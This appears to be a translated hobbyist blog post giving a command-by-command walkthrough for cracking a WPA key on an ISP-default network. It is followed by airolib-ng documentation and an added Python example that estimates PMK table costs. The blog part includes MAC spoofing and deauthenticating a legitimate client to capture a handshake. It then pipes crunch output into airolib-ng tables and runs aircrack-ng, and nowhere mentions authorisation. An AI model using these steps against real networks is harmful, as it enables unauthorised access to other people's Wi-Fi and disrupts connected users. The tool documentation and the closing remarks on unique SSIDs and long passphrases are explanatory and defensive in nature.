airolib + crunch


What a drag, what a drag, but since I'm not doing my university social service right now, I'll spend some time writing my first post..

Plenty of people know how to get WEP keys; I mean, who doesn't? Those old Wired Equivalent Privacy keys, for which someone even built a DSL-based distribution called Beini for the lazy. Give me a break. A smaller number have dug in and know how to recover a WPA key, or at least know the basic principles of it. No matter; the idea of this post is to get you out of the box you live in, think outside it, and move forward using more imagination.

Does anyone know how to use airolib? You know, rainbow-table-style tables that let you test many more keys per second than aircrack allows with a plain dictionary, where with a dual-core processor and 2 GB the most you get is 1200 K/sec. Well, enough talk, let's get to the point....

REQUIREMENTS

aircrack-ng libraries
crunch password generator binaries
a handshake of a WPA key
and a ton of patience

STEPS

airmon-ng stop wlan0 (stop your wireless card; the interface name may differ from "wlan0")

ifconfig wlan0 down (bring the card down so it can be reconfigured)

macchanger --mac 00:11:22:33:44:55 wlan0 (change the Media Access Control address to a simpler one to speed up the following steps)

iwconfig wlan0 mode monitor (switch the card to monitor mode)

airodump-ng wlan0 (monitor the Wi-Fi signals within your reach)

EXAMPLE

CH 11 ][ Elapsed: 4 s ][ 2011-11-07 10:34

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

08:76F:60:3C:E8 -78 57 0 0 11 54e WPA PSK TELMEX

BSSID STATION PWR Rate Lost Packets Probes

08:76F:60:3C:E8 00:12:34:56:78:90

aireplay-ng -9 wlan0 *OPTIONAL* (run an injection test to see whether you are in range and will be able to deauthenticate the client)

airodump-ng -c 11 -w dump --bssid 08:76F:60:3C:E8 wlan0 (listen on the network in case a handshake comes in)

## NOW WE NEED TO DEAUTHENTICATE A CLIENT (A LEGITIMATE USER CONNECTED TO THE NETWORK) TO OBTAIN A HANDSHAKE, WHERE THE KEY IS, WHICH IS THEN RECOVERED BY BRUTE FORCE.

aireplay-ng -0 10 -c 00:12:34:56:78:90 -b 08:76F:60:3C:E8 -e TELMEX wlan0

AFTER THAT YOU WILL SEE A RESPONSE LIKE THIS IN THE MONITORING WINDOW

CH 11 ][ Elapsed: 4 s ][ 2011-11-07 10:34 [HANDSHAKE:00:12:34:56:78:90]

essid.txt (write the network's name into the text file you create)

cat essid.txt (read the text file to confirm it was written)

airolib-ng wpa --import essid essid.txt (create the table named wpa and import the network name from the text file we created)

#now move to the directory where you have crunch and run it

./crunch 10 10 0123456789 | airolib-ng /root/wpa --import passwd -

#this last step imports the passwords crunch will generate, which come to 100 GIGS in total; it takes some time, but if you pay attention to the number ticking along at the bottom you'll see it creates a huge number of probable passwords, and far faster. Be patient and wait.

airolib-ng /root/wpa --stats

airolib-ng /root/wpa --clean all

airolib-ng /root/wpa --batch

airolib-ng /root/wpa --verify all

## I COULDN'T BE BOTHERED TO EXPLAIN THE REMAINING STEPS, JUST RUN THEM, DON'T MAKE A FUSS. AFTER THAT THE TABLE NAMED wpa WILL BE READY AND YOU CAN PROCEED TO CRACK THE KEY.

aircrack-ng -r /root/wpa dump-01.cap -e TELMEX

GOOD LUCK. IF YOU LIKED IT LEAVE A COMMENT, AND IF NOT, YOU KNOW WHAT TO DO TOO. ADD IT TO YOUR FAVORITES, SHARE IT ON YOUR MYSPACE, FACEBOOK, TWITTER, GOOGLE+

"hector leal"

hahahaha

if you need help with anything let me know, I'm in Tamaulipas and San Luis Potosí

STARK

s-t-a-r-k@live.com

Airolib-ng

Description

Airolib-ng is an aircrack-ng suite tool designed to store and manage ESSID and password lists, compute their Pairwise Master Keys (PMKs) and use them in WPA/WPA2 cracking. The program uses the lightweight SQLite3 database as the storage mechanism, which is available on most platforms. The SQLite3 database was selected taking into consideration platform availability plus management, memory and disk overhead.

WPA/WPA2 cracking involves calculating the pairwise master key, from which the pairwise transient key (PTK) is derived. Using the PTK, we can compute the message integrity code (MIC) for a given packet; if it turns out to be identical to the packet's MIC, the PTK was correct and therefore the PMK was correct as well. Calculating the PMK is very slow since it uses the pbkdf2 algorithm. Yet the PMK is always the same for a given ESSID and password combination. This allows us to pre-compute the PMK for given combinations and speed up cracking the WPA/WPA2 handshake. Tests have shown that using this technique in aircrack-ng can check more than 50 000 passwords per second using pre-computed PMK tables.

Computing the PMK is still required, yet we can:
- Precompute it for later and/or shared use.
- Use distributed machines to generate the PMK and use their value elsewhere.

To learn more about WPA/WPA2: see the WPA/WPA2 Information section on the wiki links page.
To learn more about coWPAtty: Will Hack For SUSHI > CoWPAtty, and the Wireless Defense CoWPAtty writeup.

As stated above, this program requires the SQLite3 database environment. You must be running version 3.3.17 or above. You may obtain the latest version from the SQLite download page.

Usage

Usage: airolib-ng <database> <operation> [options]

Where:
- database is the name of the database file. Optionally specify the full path.
- operation specifies the action you would like taken on the database. See below for a complete list.
- options may be required depending on the operation specified.

Here are the valid operations:
- --stats - Output some information about the database.
- --sql {sql} - Execute the specified SQL statement.
- --clean [all] - Perform steps to clean the database from old junk. The option 'all' will also reduce file size if possible and run an integrity check.
- --batch - Start batch-processing all combinations of ESSIDs and passwords. This must be run prior to using the database within aircrack-ng or after you have added additional SSIDs or passwords.
- --verify [all] - Verify a set of randomly chosen PMKs. If the option 'all' is given, all(!) PMKs in the database are verified and the incorrect ones are deleted.
- --export cowpatty {essid} {file} - Export to a cowpatty file.
- --import cowpatty {file} - Import a cowpatty file and create the database if it does not exist.
- --import {essid|passwd} {file} - Import a text flat file as a list of either ESSIDs or passwords and create the database if it does not exist. This file must contain one ESSID or password per line. Lines should be terminated with line feeds, meaning press enter at the end of each line when entering the values.

Usage Examples

Here are usage examples for each operation.

Status Operation

Enter: airolib-ng testdb --stats

Where: testdb is the name of the database to be created. --stats is the operation to be performed.

The system responds:

stats
There are 2 ESSIDs and 232 passwords in the database. 464 out of 464 possible combinations have been computed (100%).

ESSID     Priority  Done
Harkonen  64        100.0
teddy     64        100.0

SQL Operation

The following example will give the SSID VeryImportantESSID maximum priority.

Enter: airolib-ng testdb --sql 'update essid set prio=(select min(prio)-1 from essid) where essid="VeryImportantESSID";'

The system responds:

update essid set prio=(select min(prio)-1 from essid) where essid="VeryImportantESSID";
Query done. 1 rows affected.

The following example will look for very important patterns in the pmk.

Enter: airolib-ng testdb --sql 'select hex(pmk) from pmk where hex(pmk) like "%DEADBEEF%"'

The system responds:

hex(pmk)
BF3F122D3CE9ED6C6E7E1D7D13505E0A41EC4C5A3DEADBEEFFEFF597387AFCE3

Clean Operation

To do a basic cleaning, enter: airolib-ng testdb --clean

The system responds:

clean
Deleting invalid ESSIDs and passwords...
Deleting unreferenced PMKs...
Analysing index structure...
Done.

To do a basic cleaning, reduce the file size if possible and run an integrity check, enter: airolib-ng testdb --clean all

The system responds:

clean
Deleting invalid ESSIDs and passwords...
Deleting unreferenced PMKs...
Analysing index structure...
Vacuum-cleaning the database. This could take a while...
Checking database integrity...
integrity_check
ok
Query done. 2 rows affected.
Done.

Batch Operation

Enter: airolib-ng testdb --batch

The system responds:

Computed 464 PMK in 10 seconds (46 PMK/s, 0 in buffer). No free ESSID found. Will try determining new ESSID in 5 minutes...

Verify Operation

To verify 1000 random PMKs, enter: airolib-ng testdb --verify

The system responds:

verify
Checking ~10.000 randomly chosen PMKs...
ESSID     CHECKED  STATUS
Harkonen  233      OK
teddy     233      OK

To verify all PMKs, enter: airolib-ng testdb --verify all

The system responds:

verify
Checking all PMKs. This could take a while...
ESSID  PASSWORD  PMK_DB  CORRECT

Cowpatty Table Export Operation

Enter: airolib-ng testdb --export cowpatty test cowexportoftest

The system responds:

export
Exporting...
Done.

Import Operation

SSID

To import an ascii list of SSIDs and create the database if it does not exist, enter: airolib-ng testdb --import essid ssidlist.txt

Where: testdb is the name of the database to be updated, and it will be created if it does not exist. --import is the operation to be performed. essid indicates it is a l
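The PMK derivation the description above relies on, and the cost of the 10-digit keyspace the post feeds to crunch, worked through in Python as an added example (not code from the post or from the aircrack-ng project). The ESSID "TELMEX" and the 46 PMK/s rate come from the page; the candidate value and the second SSID are constructed.

```python
import hashlib
import time

# Constructed sample values: the ESSID used on the page and a 10-digit
# candidate of the kind "crunch 10 10 0123456789" emits.
ESSID_ON_PAGE = "TELMEX"
SAMPLE_CANDIDATE = "0123456789"
# Known-answer vector from IEEE 802.11i Annex H: passphrase "password", SSID "IEEE".
KAT_PMK_HEX = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"


def pmk(passphrase: str, essid: str) -> bytes:
    """WPA/WPA2-PSK PMK: PBKDF2-HMAC-SHA1 of the passphrase, salted with the
    ESSID, 4096 rounds, 32 bytes. Same passphrase + same ESSID => same PMK."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)

def known_answer_ok() -> bool:
    """Check pmk() against the published 802.11i test vector."""
    return pmk("password", "IEEE").hex() == KAT_PMK_HEX

def essid_bound(passphrase: str, essid_a: str, essid_b: str) -> bool:
    """True when the same passphrase gives different PMKs for two ESSIDs: a
    table built for one ESSID says nothing about another, which is why
    airolib-ng keys PMKs by ESSID and a non-default SSID defeats shared tables."""
    return pmk(passphrase, essid_a) != pmk(passphrase, essid_b)

def keyspace(charset: str, min_len: int, max_len: int) -> int:
    """Number of candidates crunch emits for a charset and length range."""
    return sum(len(charset) ** n for n in range(min_len, max_len + 1))

def table_cost(charset: str, min_len: int, max_len: int, pmk_rate: float) -> dict:
    """Cost of one ESSID's table over that keyspace: candidates, bytes of
    32-byte PMKs to store, and hours of PBKDF2 work at pmk_rate PMK/s."""
    n = keyspace(charset, min_len, max_len)
    return {"candidates": n, "pmk_bytes": n * 32, "hours": n / pmk_rate / 3600}

def measure_rate(samples: int = 20) -> float:
    """Locally measured PMK/s, comparable to what airolib-ng --batch prints."""
    t0 = time.perf_counter()
    for i in range(samples):
        pmk(f"{i:010d}", ESSID_ON_PAGE)
    return samples / (time.perf_counter() - t0)


if __name__ == "__main__":
    print("KAT ok:", known_answer_ok())
    print("ESSID-bound:", essid_bound(SAMPLE_CANDIDATE, ESSID_ON_PAGE, "OTHER_SSID"))
    print("10-digit table at the page's 46 PMK/s:", table_cost("0123456789", 10, 10, 46))
    print("this machine: %.0f PMK/s" % measure_rate())
```

At the 46 PMK/s the --batch example prints, the 10-digit space the post imports costs roughly 60,000 hours of PBKDF2 work and 320 GB of stored PMKs, so the table only pays off when one ESSID is reused across many captures, which is exactly the case with default ISP names like the post's and the reason a unique SSID and a long passphrase blunt this technique.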